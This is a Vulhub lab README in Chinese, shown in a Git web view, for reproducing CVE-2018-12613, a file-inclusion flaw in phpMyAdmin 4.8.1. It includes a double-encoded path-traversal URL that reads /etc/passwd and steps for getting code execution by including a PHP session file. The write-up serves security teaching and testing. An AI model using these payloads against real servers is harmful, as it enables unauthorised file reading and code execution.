aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/phpmyadmin/CVE-2018-12613/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

29 lines
1017 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑通过二次编码即可绕过检查造成远程文件包含漏洞。
参考文档:
- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
- https://www.phpmyadmin.net/security/PMASA-2018-4/
## 漏洞环境
执行如下命令启动phpmyadmin 4.8.1
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可进入phpmyadmin。配置的是“config”模式所以无需输入密码直接登录test账户。
## 漏洞复现
访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`,可见`/etc/passwd`被读取,说明文件包含漏洞存在:
![](1.png)
利用方式也比较简单,可以执行一下`SELECT '<?=phpinfo()?>';`然后查看自己的sessionidcookie中phpMyAdmin的值然后包含session文件即可
![](2.png)
Reference in New Issue View Git Blame Copy Permalink